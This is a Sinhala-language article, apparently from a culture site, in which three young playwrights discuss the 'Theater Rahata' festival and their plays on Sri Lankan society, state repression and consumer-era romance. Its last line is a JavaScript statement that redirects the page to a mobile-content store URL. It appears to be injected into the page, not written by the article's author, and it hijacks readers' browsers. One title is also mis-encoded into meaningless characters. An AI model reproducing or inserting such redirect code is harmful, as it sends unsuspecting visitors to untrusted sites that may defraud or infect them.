තියට(R) රහට | ආස්වාදය සහතිකයි

‘තියට රහට’ නාට්‍ය උළෙලේ පළමු අදියර ලෙස අගෝස්තු 7,8,9 කියන දින තුනේ බොරැල්ල නාමෙල් මාලිනී පුංචි තියටර් රඟහලේ සවස 3.30ට සහ 6.30ට නාට්‍ය තුනක් පෙන්වීමට කටයුතු සූදානම් වෙමින් පවතියි. අගෝස්තු 7, චමිල ප‍්‍රියංකගේ ‘මෙය තුවක්කුවක් නොවේ’ නාට්‍යයත්, අගෝස්තු 8, චාමර ගුරුගේගේ  What a Nice Couple නාට්‍යයත්, අගෝස්තු 9, අසංක සායක්කාරගේ ‘සංඝදාසගේ චූටි කලිසම’ නාට්‍යයත් වේදිකාගතවීමට නියමිතය. ලංකාවේ තරුණ නාට්‍යකරුවන් තිදෙනකු විසින් ලාංකේය සමාජ දේශපාලන පරිසරය පිළිබඳව සිදුකරන එකිනෙකට වෙනස් වූ කියවීම් ති‍්‍රත්වයක් මෙම නාට්‍ය තුන හරහා මතු කිරීමට බලාපොරොත්තු වන අතර මේ එම උළෙල පිළිබඳව නාට්‍ය නිර්මාණකරුවන් තිදෙනා සමග කළ කතාබහකි.

මේ උළෙල සංවිධානය කිරීමට හේතු වූ කාරණා කතාකළොත්..

චරිත දිසානායක මහතාගේ ‘අහස’ මීඩියා වර්ක්ස් ආයතනය තමයි මෙම නාට්‍ය උළෙලට අනුග‍්‍රහය දක්වනු ලබන්නේ. ශ‍්‍රී ලංකාවේ නාට්‍ය උළෙල බොහෝ විට සංවිධානය වෙන්නේ එක්කෝ තනි පුද්ගලයෙක් කේන්ද්‍ර කරගත් නාට්‍ය උළෙලක්, එහෙම නැත්නම් සම්මාන කේන්ද්‍ර කරගත් නාට්‍ය උළෙලක් විදියට පමණයි. ඉන් මිදිලා මේ වගේ එකිනෙකට වෙනස් රසයන් තුනක් තිබෙන, නාට්‍ය තුනක්, උළෙලක් විදියට මෙච්චර කාලයක් කෙරිලා නැහැ. ඉතින් මෙම උළෙල අගෝස්තුවලින් නොනැවතී රට පුරා ඉදිරි අවුරුද්ද පුරා රැුගෙන යන්නට බලාපොරොත්තු වෙනවා.

ඒ වගේම ඉදිරියට ප‍්‍රදර්ශනය වෙන නාට්‍ය වෙනස් කරමින් මෙම නාට්‍ය උළෙලේ අදහස ඉදිරියට ගෙන යන්න බලාපොරොත්තු වෙනවා. නාට්‍යයක් ජනතාව අතරට යන්න පුළුවන් වෙන්නේ හුදු ජනප‍්‍රිය රැුල්ලට නාට්‍ය සැකසුණොත්ය කියන මතවාදයට ප‍්‍රතිමතවාදයක් හැටියට තමයි මෙම උළෙල ඉදිරියට යන්නේ.

මෙවැනි උළෙලක අද දවසේ ඇති වැදගත්කම මොකක්ද?

නාට්‍යකරුවෝ විදියට අපි මුහුණ දෙන ප‍්‍රශ්න රැසක් තියෙනවා. එකක් තමයි විශේෂයෙන්ම ලංකාව් තරුණයන්ගේ නාට්‍ය කලාව තියෙන්නේ රාජ්‍ය නාට්‍ය උළෙල හෝ යොවුන් නාට්‍ය උළෙල මතයි. ඊට වෙනස්ව නාට්‍ය වර්ගයක් තියෙනවා. ඒවා අපි ‘දුවන නාට්‍ය’ කියලා හඳුන්වනවා. දුවන නාට්‍ය කියන්නේ ගම්දනව්වලට ගිහිල්ලා හැමතැනම පෙන්නන නාට්‍යවලට. මේ දුවන නාට්‍යවලට අදාළ වෙනම ලක්ෂණ ටිකක් තියෙනවා. උදාහරණයක් විදියට ජනප‍්‍රිය නළුනිළියන් භාවිත කිරීම, මතුපිට හාස්‍ය රසය වගේ කාරණා ලංකාවේ දුවන නාට්‍යයකට අත්‍යවශ්‍යයි. ඇත්තටම මෙබඳු ලක්ෂණ විශිෂ්ට නාට්‍ය කෘතියක මට්ටම මනින මිනුම් නෙමෙයි. ඉතින් මෙවැනි මිනුම නැති විශිෂ්ට නාට්‍ය එක්තරා තැනකට පමණක් හිරවෙනවා. මේ තත්ත්වය යම් තරමකට හෝ විසඳීමට මෙවැනි නාට්‍ය උළෙලකට හැකිවෙනවා කියලා හිතෙනවා.

අනිත් කාරණේ තමයි තරුණ නාට්‍යකරුවො විශාල මහන්සියක් දරලා, විශාල ශ‍්‍රමයක් කැපකරලා නාට්‍ය නිෂ්පාදනය කරනවා. නමුත් මෙම නාට්‍යවල පැවැත්ම තීරණය වෙන්නේ ඒ අයගේ මුදල් හැකියාව මතයි. මුදල් ඉවර වෙන්නේ කොතැනින්ද නාට්‍යය ප‍්‍රදර්ශනය වීමත් එතැනින් නතර වෙනවා. නමුත් එම නාට්‍ය වෙනුවෙන් කැපකරන ශ‍්‍රමය සාමාන්‍යයෙන් අවුරුද්දක් හෝ එකහමාරක් පුරා දිවෙනවා. එබඳු ශ‍්‍රමයක් නාට්‍ය දර්ශන දෙකකින් පමණ අවසන් වෙනවා කියන්නේ විශාල අපරාධයක්. ඒ නිසා එම නාට්‍යයේ වටිනාකමට සාපේක්ෂ දර්ශන වාර සංඛ්‍යාවක් අත්‍යවශ්‍යයි. ඉතින් මෙවැනි උළෙලක් මගින් එබඳු වූ මහන්සියකට වටිනාකමක් ලබා දෙනවා.

 

sangadasa

 

මෙම උළෙලේ ප‍්‍රදර්ශනය වීමට නියමිත ‘සංඝදාසගේ චූටි කලිසම’ නාට්‍ය පිළිබඳව කතා කළොත්..

සරලව ගත්තොත් මේ වෙලාවේ සේවාවන් අත්පත් කරගන්න ගියාට පස්සේ මිනිස්සු මුහුණ දෙන ඛේදාන්තය මෙම නාට්‍යය තුළ සාකච්ඡුා වෙනවා. ලංකාව අපි හඳුන්වන්නේ සුබසාධන රාජ්‍යයක් කියලනේ. ඉතින් සුභසාධන රාජ්‍යය තුළ මිනිසෙක් සේවාවන් අත්පත් කරගැනීමට යෑමේදී ඒ මිනිසාට පෙරලා රාජ්‍යය විසින් ඇතිකරන පීඩනය මෙහිදී මතු කෙරෙනවා. සංඝදාස කියන ගැමි චරිතය සහ හෙදියක් අතර ඇතිවන නාට්‍යමය සිදුවීමක් මෙම නාට්‍යය වටා ගෙතෙනවා. ඉතාම පහළ මට්ටමේ සෞඛ්‍ය සේවයක් බලාපොරොත්තුවෙන් යන මිනිහා අවසානයේ අපරාධකාරයෙක් බවට පත්වෙනවා. මාධ්‍ය, පොලීසිය, වැඩවර්ජන සහ වෘත්තීය සේවක සමිති කියන සියලූ දේවල් පෙරලා රාජ්‍ය යාන්ත‍්‍රණය ශක්තිමත් කරන්නේ කොහොමද කියන දේ නාට්‍යය තුළ මතු වෙනවා. මෙම නාට්‍යය තුළ තිබෙන්නේ ප‍්‍රහසන ආකෘතියක්. නමුත් මේක හුදු ප‍්‍රහසනයක් නෙමෙයි. ‘සංඝදාසගේ චූටි කලිසම’ කියලා කියන්නේ රුදු ප‍්‍රහසනයක් (Black Comedy). අපි හැමෝම මුහුණදෙන රෞද්‍ර කතන්දරය තමයි මේක ඇතුළේ තියෙන්නේ. හිනායන්න පුළුවන්, හිනාගියත් ඒ තුළ තියෙන්නේ අපි කාටවත් හිනාවෙන්න පුළුවං දෙයක් නෙමෙයි. මේ මොහොත වනවිට ලංකාවේ ආයතන පද්ධතියේ අසාර්ථක භාවයත් පුරවැසියාගේ අර්බුදයත් මෙහිදී මතු කරන්න උත්සාහ කරනවා.

සංඝදාස කියන්නේ මේ මොහොතේ සිටින ලාංකීය මිනිසාට. ඉතිං සංඝදාසගේ චූටි කලිසම අහිමි වීමෙන් පස්සෙ මිනිහා නිරුවත් වෙනවා. මිනිහෙකුගේ ඇඳුම් උනාගෙන, උනාගෙන ගියාට පස්සේ අන්තිමට ඉතුරු වෙන්නේ මේ චූටි කලිසම. ඒකත් අහිමි වෙනවා.

 

This-is-not-a-gun

‘මෙය තුවක්කුවක් නොවේ’ මොකක්ද මේකේ අදහස?

මෙය තුවක්කුවක් නොවේ නාට්‍යයේ පදනම සමාජ අනාරක්ෂිතභාවය, පශ්චාත් යුද වාතාවරණය තුළ අපි හරි ආරක්ෂිත සමාජයක් කියලා හැමෝම විශ්වාස කරන්න පටන් ගත්තා. යුද්දේ අවසානයත් සමග සියලූ දේ සාමකාමී වෙයි කියලා සමාජීය විශ්වාසයක් තිබුණා. නමුත් මෙම ඊනියා විශ්වාසය, එහෙමත් නැතිනම් පලූදු වූ විශ්වාසය පිළිබඳව ‘මෙය තුවක්කුවක් නොවේ’ නාට්‍යය තුළ සාකච්ඡා කිරීමට උත්සාහ ගන්නවා. අනිත් පැත්තෙන් ආගම මිනිස්සුන්ගේ ජීවිත නිර්දේශපාලනය තුළ ගාල් කරන්නේ කොහොමද කියන කාරණාව මෙහිදී මතුකරන්න උත්සාහ ගත්තා. එක් පැත්තකින් සමාජ අනාරක්ෂිතභාවයත්, ඊට එරෙහිවීමට ඇති අවකාශය නිර්දේශපාලනික කරන ආගමික දෘෂ්ටිවාදයත් නාට්‍යය තුළ අපූරු රටාවක් මවනවා.

දෘෂ්ටිවාදයට භෞතික පැවැත්මක් තියෙනවා කියන කාරණය ලූවී අල්තුෂර් කියන දේශපාලන න්‍යායවේදියා  Lenin and Philosophy කියන කෘතියේදී මතුකරනවා. ඉතින් නාට්‍යය තුළ භෞතිකව තුවක්කුවක් තියෙනවා. ඒ කියන්නේ රාජ්‍ය මර්දනය පැහැදිලිවම පේනවා. හැබැයි අපේ දෘෂ්ටිවාදය හදලා තියෙන්නේ මේක තුවක්කුවක් නෙවෙයි කියලා. දෘෂ්ටිවාදය විසින් මර්දනය සාධාරණීයකරණය කිරීම කියන්නේ ‘මෙය තුවක්කුවක් නොවේ’ කියන නාට්‍යයට තවත් නමක්.

 

What-a-nice-couple

What a Nice Couple කියන්නේ තවත් පේ‍්‍රම කතාවක්ද?

මේ කාලේ ෆේස්බුක් එකේ බොහෝ අලූත කසාද බැඳපු, එහෙමත් නැත්තම් තරුණ පෙම්වතුන්ගේ ලස්සන ඡායාරූප අපි දකිනවා. ඒවා දැක්කාම අපිට හරි ලස්සන ජීවිත පෙනෙනවා. ලස්සන පෙම්වතුන් දකිනවා. හරි ලස්සන විවාහක ජෝඩු දකිනවා. ඉතිං අපිට මෙහෙම පෙනෙන පුදුමාකාර ලස්සන කපල්වලට What a Nice Couple වගේ කමෙන්ට්ස් අපි දානවා. ලස්සනට කනබොන, ලස්සනට යන එන, ලස්සනට ජීවත් වෙන, ලස්සන හෝටල්වල සතිඅන්ත ගතකරන, ලස්සන කාර්වල ෂොපිං යන ජෝඩු අපි අනන්තවත් දකිනවා. උය්එ ් භසජැ ක්‍දමචකැ කියන්නේ මෙවැනි ජෝඩුවකගේ නිවසක බිත්තියක් තුළින් ඔවුන්ව විනිවිද දකින මොහොතක්. මේ ලස්සන ඇතුළත කොච්චර ලස්සනද? ඇතුළත තියෙන ගැටලූ පිටතට ඇත්තටම පෙනෙනවාද? පිට සහ ඇතුළත අතර තියෙන පරස්පරය මොකද්ද?

අපි ජීවත් වෙන ධනේශ්වර ක‍්‍රමය ඇතුළේ අපිට කරන්න වෙලා තියෙන රැකියා සහ එම රැකියා ඇතුළේ අපේ පුද්ගලික පෞරුෂයන් ගොඩ නගාගන්න සිද්ධවෙලා තියෙන සීමාවන් ඇතුළේ මේකෙන් ගොඩ යන්න, මේකේ කට්ට කන්න, මේකේ කොඩිය ගහන්න මිනිස්සුන්ට දාහක් දේවල් කැපකරන්න වෙනවා. මං හිතන්නේ මිනිස්සු වැඩියෙන්ම කැපකරලා තියෙන්නෙ ආදරය. මේ සමාජය දැඩි සේ ආදරය අපයෝජනයට ලක්වෙච්ච සමාජයක්. තමන් රස්සාව කරන තැන, තමන් ඉගෙන ගන්න තැන, සමාජයත් එක්ක සම්බන්ධතා පවත්වන හැම මොහොතකදීම අපි අපේ ආදරය අපයෝජනයට ලක් කරගන්නවා. ඉන් පසුව ඇතිවෙන වේදනාවේ වින්දිතයෝ විදියට තමයි අපි මේ සමාජෙ ජීවත් වෙන්නේ. What a Nice Couple ඒ අය ගැන කතා කරන කතාවක්.

 window.location = “http://www.mobilecontentstore.mobi/?sl=319481-c261c&data1=Track1&data2=Track2”;